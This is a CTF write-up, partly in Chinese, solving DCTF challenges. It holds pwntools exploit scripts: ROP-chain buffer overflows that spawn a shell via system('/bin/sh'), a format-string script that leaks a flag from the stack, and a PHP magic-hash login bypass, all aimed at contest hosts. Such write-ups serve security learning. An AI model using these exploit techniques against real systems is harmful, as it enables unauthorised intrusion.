pwn
Pwn sanity check
https://blog.yutian233.xyz/
from pwn import *
context.log_level = 'debug'
# io = process("./pwn_sanity_check")
io = remote("dctf-chall-pwn-sanity-check.westeurope.azurecontainer.io", 7480)
pop_rdi = 0x0000000000400813
system_plt = 0x4006e2
bin_sh = 0x40089E
payload = b"A" * (0x40 + 8) + p64(pop_rdi) + p64(bin_sh) + p64(system_plt)
io.sendline(payload)
io.interactive()
Pinch me
from pwn import *
context.log_level = 'debug'
# io = process("./pinch_me")
io = remote("dctf1-chall-pinch-me.westeurope.azurecontainer.io", 7480)
pop_rdi = 0x000000000040125b
system_plt = 0x4011a8
bin_sh = 0x402047
payload = b"A" * (0x20 + 8) + p64(pop_rdi) + p64(bin_sh) + p64(system_plt)
io.sendline(payload)
io.interactive()
Readme
格式化字符串漏洞,程序会从flag.txt读取并存放在栈中,然后写个脚本一个一个读出来就好了
from pwn import *
import re
flag = []
for i in range(8, 17):
io = remote("dctf-chall-readme.westeurope.azurecontainer.io", 7481)
pad = "%{}$p".format(i)
io.sendline(pad)
io.recvline()
val = io.recvline()
# print(val)
val = re.findall("0x(.*)", str(val))
# flag.append(val)
print(val)
得到
[
'77306e7b66746364',
'646133725f30675f',
'30625f656d30735f',
'7f1800356b30',
'a7024323125',
'55d702c4f97d',
'7fda27a53fc8',
'56487a688930'
]
转码得到
dctf{n0w_g0_r3ad_s0me_b0%12$p
0k5
将得到的flag拼接一下为 dctf{n0w_g0_r3ad_s0me_b00k5}
web
Very secure website
根据 https://www.whitehatsec.com/blog/magic-hashes/ 0e
传入 /login.php?username=admin&password=479763000,得到flag